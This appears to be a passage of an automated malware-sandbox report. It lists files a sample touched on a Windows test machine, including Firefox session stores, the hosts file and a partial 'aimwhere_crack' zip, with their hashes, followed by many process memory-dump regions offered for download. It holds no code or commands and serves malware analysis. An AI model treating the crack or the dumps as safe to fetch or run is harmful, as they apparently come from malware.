5a8bb25f0d80a370c66a27e66275fc1748559396

SHA256
d84a662920a9309d19b796dd0b09a34a18aba690edc5c6906c515156a157a442

SHA512
dc67da5627bbbe1b524042da26d4106f918cd891eba5e8ebb70965cd69689f9168c92c3f6ef2376a2ff2dc32064272dfbc4a4cad3ec78b0b8fe8e749fe0e89b2

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\afevplna.default-release\sessionstore-backups\recovery.jsonlz4

Filesize
3KB

MD5
ae44555cde25501119ae1be5d73f17a5

SHA1
9a14f817a767484b9f1c9ea56f22b699f00d433e

SHA256
b91b5494e23010619666548affbb99e66a16e0751daddbb94794a78b74db1319

SHA512
4b8943e4153e7c71371061e54bfae03b0d4731e739acac6e4841387ec6afa1fe7c68c55a724f80f5f2285918ec04b50983863d3f088fdd27f62aa75488409283

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\afevplna.default-release\sessionstore-backups\recovery.jsonlz4

Filesize
9KB

MD5
cd957202d182972e120d771f9aa33ae7

SHA1
ad590f7e51fe0a3029bef7bacf22c06dd16821d3

SHA256
a051b10e7d645d266311ca100bcffa5a1c48177db27ff61750e64ff50bcb2a45

SHA512
d2257aef11f2eefb9e15c40e7cf1d5f5fb1e677bb3f0b123b3bdc04ac9abb3d0222c247652dc1093b931fe45926d20df1c07641fb817dc989408553ad99bd8f4

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\afevplna.default-release\sessionstore.jsonlz4

Filesize
4KB

MD5
b43df66503a6d720bc1a59f5e8d710af

SHA1
209f8d50fb0c957270f73060441f8df4a535e2ec

SHA256
a3942a554f477d51d5530bf6f473554def680e61117126929bfa3eae42ff8018

SHA512
27d72d39757a3a69f02c4712d9377a811edc240cf5f9460ba630385c62ea7b3af84a99dc7a1b6997c8e1ef7ce354890ff666989eba190ebb8cc21a8ce4fdee23

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\afevplna.default-release\sessionstore.jsonlz4

Filesize
6KB

MD5
354fabdfce9d75ad77db05e7630cc7c4

SHA1
f286ddc901dca3651bb089a5f48d6b8ecc79078a

SHA256
8607e755f741e1e54d0c384daad16ca81967ad26f731bd2da3e198471694834d

SHA512
9545ec2f465f237fa7ce5fa975d987813de1960dc1652b8379e0ed91e1b988ca7177c454acd73b457ccec4357fd5d7b7872288553761b3c2d55c2cf20855422e

Download Submit
C:\Users\Admin\Downloads\Unconfirmed 736350.crdownload

Filesize
1.9MB

MD5
a12a6ab201f3fcf5a224b83ae36f0107

SHA1
25ddb238bc8f4514c0004badbfb7723816d6d269

SHA256
d6eefb70ff36e758677fdf5b6f6c7873754421c430ca2206f307cbaa3326d832

SHA512
3443c41c78ea351f0057109a8116a35cac20ee1c3c28bb66c8cd6014a40a5fd7e45d722cc239176e754131f6d5385aef8f8ba34ed39ca6ac2cae34b491e2f21b

Download Submit
C:\Users\Admin\Downloads\aimwhere_crack.IP4Axdyb.zip.part

Filesize
30KB

MD5
c94f39a55672f70d2f12045d75a66a54

SHA1
5ecd9e2cd1490890576f7c247d93c76ce121051c

SHA256
86da971914f42247bc1d8bed868808b11a513ab4bfcbc885a98bc588924f2a63

SHA512
b11fcd330aaa22abb9f760cf6605d9fb68a4290fb46854c3c6749d70473d7b0b008f5ed3690cae331211d36859c03561d8afffdb86054aa95e0c811a220327f5

Download Submit
C:\Windows\System32\drivers\etc\hosts

Filesize
2KB

MD5
f99e42cdd8b2f9f1a3c062fe9cf6e131

SHA1
e32bdcab8da0e3cdafb6e3876763cee002ab7307

SHA256
a040d43136f2f4c41a4875f895060fb910267f2ffad2e3b1991b15c92f53e0f0

SHA512
c55a5e440326c59099615b21d0948cdc2a42bd9cf5990ec88f69187fa540d8c2e91aebe6a25ed8359a47be29d42357fec4bd987ca7fae0f1a6b6db18e1c320a6

Download Submit
memory/1412-1586-0x00007FFB67980000-0x00007FFB67999000-memory.dmp

Filesize
100KB

Download
memory/1412-1575-0x00007FFB51870000-0x00007FFB51E62000-memory.dmp

Filesize
5.9MB

Download
memory/1412-1584-0x00007FFB69090000-0x00007FFB690B3000-memory.dmp

Filesize
140KB

Download
memory/1412-1585-0x00007FFB522B0000-0x00007FFB5242E000-memory.dmp

Filesize
1.5MB

Download
memory/1412-1583-0x00007FFB690C0000-0x00007FFB690D9000-memory.dmp

Filesize
100KB

Download
memory/1412-1582-0x00007FFB690E0000-0x00007FFB6910D000-memory.dmp

Filesize
180KB

Download
memory/1412-1577-0x00007FFB6AAA0000-0x00007FFB6AAAF000-memory.dmp

Filesize
60KB

Download
memory/1412-1576-0x00007FFB69110000-0x00007FFB69134000-memory.dmp

Filesize
144KB

Download
memory/1612-158-0x00000250B5F60000-0x00000250B5F82000-memory.dmp

Filesize
136KB

Download
memory/2360-1507-0x00007FFB61450000-0x00007FFB61483000-memory.dmp

Filesize
204KB

Download
memory/2360-1500-0x00007FFB6AAA0000-0x00007FFB6AAAF000-memory.dmp

Filesize
60KB

Download
memory/2360-1245-0x00007FFB6AAA0000-0x00007FFB6AAAF000-memory.dmp

Filesize
60KB

Download
memory/2360-1244-0x00007FFB69090000-0x00007FFB690B4000-memory.dmp

Filesize
144KB

Download
memory/2360-1250-0x00007FFB67970000-0x00007FFB6799D000-memory.dmp

Filesize
180KB

Download
memory/2360-1253-0x00007FFB523B0000-0x00007FFB5252E000-memory.dmp

Filesize
1.5MB

Download
memory/2360-1513-0x00007FFB51750000-0x00007FFB5186C000-memory.dmp

Filesize
1.1MB

Download
memory/2360-1512-0x00007FFB51870000-0x00007FFB51E62000-memory.dmp

Filesize
5.9MB

Download
memory/2360-1499-0x00007FFB69090000-0x00007FFB690B4000-memory.dmp

Filesize
144KB

Download
memory/2360-1243-0x00007FFB51870000-0x00007FFB51E62000-memory.dmp

Filesize
5.9MB

Download
memory/2360-1501-0x00007FFB67970000-0x00007FFB6799D000-memory.dmp

Filesize
180KB

Download
memory/2360-1502-0x00007FFB659C0000-0x00007FFB659D9000-memory.dmp

Filesize
100KB

Download
memory/2360-1503-0x00007FFB614D0000-0x00007FFB614F3000-memory.dmp

Filesize
140KB

Download
memory/2360-1504-0x00007FFB523B0000-0x00007FFB5252E000-memory.dmp

Filesize
1.5MB

Download
memory/2360-1505-0x00007FFB676A0000-0x00007FFB676AD000-memory.dmp

Filesize
52KB

Download
memory/2360-1506-0x00007FFB659A0000-0x00007FFB659B9000-memory.dmp

Filesize
100KB

Download
memory/2360-1509-0x00007FFB4F800000-0x00007FFB4FD29000-memory.dmp

Filesize
5.2MB

Download
memory/2360-1510-0x00007FFB674D0000-0x00007FFB674DD000-memory.dmp

Filesize
52KB

Download
memory/2360-1511-0x00007FFB65700000-0x00007FFB65714000-memory.dmp

Filesize
80KB

Download
memory/2360-1508-0x00007FFB522E0000-0x00007FFB523AD000-memory.dmp

Filesize
820KB

Download
memory/2360-1483-0x00007FFB61450000-0x00007FFB61483000-memory.dmp

Filesize
204KB

Download
memory/2360-1482-0x00007FFB676A0000-0x00007FFB676AD000-memory.dmp

Filesize
52KB

Download
memory/2360-1448-0x00007FFB69090000-0x00007FFB690B4000-memory.dmp

Filesize
144KB

Download
memory/2360-1443-0x00007FFB523B0000-0x00007FFB5252E000-memory.dmp

Filesize
1.5MB

Download
memory/2360-1252-0x00007FFB614D0000-0x00007FFB614F3000-memory.dmp

Filesize
140KB

Download
memory/2360-1251-0x00007FFB659C0000-0x00007FFB659D9000-memory.dmp

Filesize
100KB

Download
memory/2360-1255-0x00007FFB676A0000-0x00007FFB676AD000-memory.dmp

Filesize
52KB

Download
memory/2360-1254-0x00007FFB659A0000-0x00007FFB659B9000-memory.dmp

Filesize
100KB

Download
memory/2360-1256-0x00007FFB61450000-0x00007FFB61483000-memory.dmp

Filesize
204KB

Download
memory/2360-1257-0x00007FFB522E0000-0x00007FFB523AD000-memory.dmp

Filesize
820KB

Download
memory/2360-1258-0x00007FFB4F800000-0x00007FFB4FD29000-memory.dmp

Filesize
5.2MB

Download
memory/2360-1259-0x000001DB90D70000-0x000001DB91299000-memory.dmp

Filesize
5.2MB

Download
memory/2360-1262-0x00007FFB674D0000-0x00007FFB674DD000-memory.dmp

Filesize
52KB

Download
memory/2360-1444-0x00007FFB659A0000-0x00007FFB659B9000-memory.dmp

Filesize
100KB

Download
memory/2360-1442-0x00007FFB614D0000-0x00007FFB614F3000-memory.dmp

Filesize
140KB

Download
memory/2360-1264-0x00007FFB69090000-0x00007FFB690B4000-memory.dmp

Filesize
144KB

Download
memory/2360-1265-0x00007FFB51750000-0x00007FFB5186C000-memory.dmp

Filesize
1.1MB

Download
memory/2360-1260-0x00007FFB51870000-0x00007FFB51E62000-memory.dmp

Filesize
5.9MB

Download
memory/2360-1261-0x00007FFB65700000-0x00007FFB65714000-memory.dmp

Filesize
80KB

Download
memory/3092-359-0x00007FFB50CC0000-0x00007FFB511E9000-memory.dmp

Filesize
5.2MB

Download
memory/3092-348-0x00007FFB520D0000-0x00007FFB526C2000-memory.dmp

Filesize
5.9MB

Download
memory/3092-67-0x00007FFB520D0000-0x00007FFB526C2000-memory.dmp

Filesize
5.9MB

Download
memory/3092-127-0x00007FFB674E0000-0x00007FFB674EF000-memory.dmp

Filesize
60KB

Download
memory/3092-126-0x00007FFB65870000-0x00007FFB65894000-memory.dmp

Filesize
144KB

Download
memory/3092-132-0x00007FFB60FF0000-0x00007FFB6101D000-memory.dmp

Filesize
180KB

Download
memory/3092-133-0x00007FFB60DC0000-0x00007FFB60DD9000-memory.dmp

Filesize
100KB

Download
memory/3092-134-0x00007FFB60C50000-0x00007FFB60C73000-memory.dmp

Filesize
140KB

Download
memory/3092-135-0x00007FFB516E0000-0x00007FFB5185E000-memory.dmp

Filesize
1.5MB

Download
memory/3092-137-0x00007FFB61440000-0x00007FFB6144D000-memory.dmp

Filesize
52KB

Download
memory/3092-136-0x00007FFB60CC0000-0x00007FFB60CD9000-memory.dmp

Filesize
100KB

Download
memory/3092-138-0x00007FFB5FE60000-0x00007FFB5FE93000-memory.dmp

Filesize
204KB

Download
memory/3092-139-0x00007FFB511F0000-0x00007FFB512BD000-memory.dmp

Filesize
820KB

Download
memory/3092-140-0x00007FFB50CC0000-0x00007FFB511E9000-memory.dmp

Filesize
5.2MB

Download
memory/3092-141-0x000001F9476F0000-0x000001F947C19000-memory.dmp

Filesize
5.2MB

Download
memory/3092-142-0x00007FFB61BC0000-0x00007FFB61BD4000-memory.dmp

Filesize
80KB

Download
memory/3092-144-0x00007FFB613B0000-0x00007FFB613BD000-memory.dmp

Filesize
52KB

Download
memory/3092-143-0x00007FFB520D0000-0x00007FFB526C2000-memory.dmp

Filesize
5.9MB

Download
memory/3092-371-0x00007FFB60CC0000-0x00007FFB60CD9000-memory.dmp

Filesize
100KB

Download
memory/3092-146-0x00007FFB65870000-0x00007FFB65894000-memory.dmp

Filesize
144KB

Download
memory/3092-147-0x00007FFB515C0000-0x00007FFB516DC000-memory.dmp

Filesize
1.1MB

Download
memory/3092-363-0x00007FFB60C50000-0x00007FFB60C73000-memory.dmp

Filesize
140KB

Download
memory/3092-360-0x00007FFB61BC0000-0x00007FFB61BD4000-memory.dmp

Filesize
80KB

Download
memory/3092-358-0x00007FFB511F0000-0x00007FFB512BD000-memory.dmp

Filesize
820KB

Download
memory/3092-372-0x00007FFB61440000-0x00007FFB6144D000-memory.dmp

Filesize
52KB

Download
memory/3092-355-0x00007FFB60CC0000-0x00007FFB60CD9000-memory.dmp

Filesize
100KB

Download
memory/3092-354-0x00007FFB516E0000-0x00007FFB5185E000-memory.dmp

Filesize
1.5MB

Download
memory/3092-349-0x00007FFB65870000-0x00007FFB65894000-memory.dmp

Filesize
144KB

Download
memory/3092-374-0x00007FFB511F0000-0x00007FFB512BD000-memory.dmp

Filesize
820KB

Download
memory/3092-378-0x00007FFB515C0000-0x00007FFB516DC000-memory.dmp

Filesize
1.1MB

Download
memory/3092-385-0x00007FFB516E0000-0x00007FFB5185E000-memory.dmp

Filesize
1.5MB

Download
memory/3092-384-0x00007FFB60C50000-0x00007FFB60C73000-memory.dmp

Filesize
140KB

Download
memory/3092-383-0x00007FFB60DC0000-0x00007FFB60DD9000-memory.dmp

Filesize
100KB

Download
memory/3092-382-0x00007FFB60FF0000-0x00007FFB6101D000-memory.dmp

Filesize
180KB

Download
memory/3092-381-0x00007FFB674E0000-0x00007FFB674EF000-memory.dmp

Filesize
60KB

Download
memory/3092-380-0x00007FFB65870000-0x00007FFB65894000-memory.dmp

Filesize
144KB

Download
memory/3092-379-0x00007FFB520D0000-0x00007FFB526C2000-memory.dmp

Filesize
5.9MB

Download
memory/3092-377-0x00007FFB613B0000-0x00007FFB613BD000-memory.dmp

Filesize
52KB

Download
memory/3092-376-0x00007FFB61BC0000-0x00007FFB61BD4000-memory.dmp

Filesize
80KB

Download
memory/3092-375-0x00007FFB50CC0000-0x00007FFB511E9000-memory.dmp

Filesize
5.2MB

Download
memory/3092-357-0x00007FFB5FE60000-0x00007FFB5FE93000-memory.dmp

Filesize
204KB

Download
memory/3092-373-0x00007FFB5FE60000-0x00007FFB5FE93000-memory.dmp

Filesize
204KB

Download
memory/4480-1169-0x00007FFB690B0000-0x00007FFB690C9000-memory.dmp

Filesize
100KB

Download
memory/4480-944-0x00007FFB69090000-0x00007FFB6909D000-memory.dmp

Filesize
52KB

Download
memory/4480-928-0x00007FFB6AAA0000-0x00007FFB6AAAF000-memory.dmp

Filesize
60KB

Download
memory/4480-927-0x00007FFB69130000-0x00007FFB69154000-memory.dmp

Filesize
144KB

Download
memory/4480-936-0x00007FFB522B0000-0x00007FFB5242E000-memory.dmp

Filesize
1.5MB

Download
memory/4480-935-0x00007FFB690D0000-0x00007FFB690F3000-memory.dmp

Filesize
140KB

Download
memory/4480-934-0x00007FFB691A0000-0x00007FFB691B9000-memory.dmp

Filesize
100KB

Download
memory/4480-933-0x00007FFB69100000-0x00007FFB6912D000-memory.dmp

Filesize
180KB

Download
memory/4480-938-0x00007FFB690A0000-0x00007FFB690AD000-memory.dmp

Filesize
52KB

Download
memory/4480-937-0x00007FFB690B0000-0x00007FFB690C9000-memory.dmp

Filesize
100KB

Download
memory/4480-940-0x00007FFB520E0000-0x00007FFB521AD000-memory.dmp

Filesize
820KB

Download
memory/4480-939-0x00007FFB659A0000-0x00007FFB659D3000-memory.dmp

Filesize
204KB

Download
memory/4480-941-0x00007FFB4F800000-0x00007FFB4FD29000-memory.dmp

Filesize
5.2MB

Download
memory/4480-942-0x00000200932C0000-0x00000200937E9000-memory.dmp

Filesize
5.2MB

Download
memory/4480-1131-0x00007FFB690D0000-0x00007FFB690F3000-memory.dmp

Filesize
140KB

Download
memory/4480-1126-0x00007FFB51870000-0x00007FFB51E62000-memory.dmp

Filesize
5.9MB

Download
memory/4480-1141-0x00007FFB69130000-0x00007FFB69154000-memory.dmp

Filesize
144KB

Download
memory/4480-1137-0x00007FFB4F800000-0x00007FFB4FD29000-memory.dmp

Filesize
5.2MB

Download
memory/4480-926-0x00007FFB51870000-0x00007FFB51E62000-memory.dmp

Filesize
5.9MB

Download
memory/4480-1104-0x00007FFB51870000-0x00007FFB51E62000-memory.dmp

Filesize
5.9MB

Download
memory/4480-1167-0x00007FFB690D0000-0x00007FFB690F3000-memory.dmp

Filesize
140KB

Download
memory/4480-1136-0x00007FFB520E0000-0x00007FFB521AD000-memory.dmp

Filesize
820KB

Download
memory/4480-1133-0x00007FFB690B0000-0x00007FFB690C9000-memory.dmp

Filesize
100KB

Download
memory/4480-1132-0x00007FFB522B0000-0x00007FFB5242E000-memory.dmp

Filesize
1.5MB

Download
memory/4480-1165-0x00007FFB69100000-0x00007FFB6912D000-memory.dmp

Filesize
180KB

Download
memory/4480-1135-0x00007FFB659A0000-0x00007FFB659D3000-memory.dmp

Filesize
204KB

Download
memory/4480-1173-0x00007FFB4F800000-0x00007FFB4FD29000-memory.dmp

Filesize
5.2MB

Download
memory/4480-1181-0x00007FFB691A0000-0x00007FFB691B9000-memory.dmp

Filesize
100KB

Download
memory/4480-1180-0x00007FFB522B0000-0x00007FFB5242E000-memory.dmp

Filesize
1.5MB

Download
memory/4480-943-0x00007FFB67980000-0x00007FFB67994000-memory.dmp

Filesize
80KB

Download
memory/4480-1179-0x00007FFB6AAA0000-0x00007FFB6AAAF000-memory.dmp

Filesize
60KB

Download
memory/4480-1178-0x00007FFB69130000-0x00007FFB69154000-memory.dmp

Filesize
144KB

Download
memory/4480-1177-0x00007FFB69090000-0x00007FFB6909D000-memory.dmp

Filesize
52KB

Download
memory/4480-1176-0x00007FFB51750000-0x00007FFB5186C000-memory.dmp

Filesize
1.1MB

Download
memory/4480-1174-0x00007FFB67980000-0x00007FFB67994000-memory.dmp

Filesize
80KB

Download
memory/4480-1172-0x00007FFB520E0000-0x00007FFB521AD000-memory.dmp

Filesize
820KB

Download
memory/4480-1171-0x00007FFB659A0000-0x00007FFB659D3000-memory.dmp

Filesize
204KB

Download
memory/4480-946-0x00007FFB51750000-0x00007FFB5186C000-memory.dmp

Filesize
1.1MB

Download
memory/4480-1162-0x00007FFB51870000-0x00007FFB51E62000-memory.dmp

Filesize
5.9MB

Download
memory/4480-1170-0x00007FFB690A0000-0x00007FFB690AD000-memory.dmp

Filesize
52KB

Download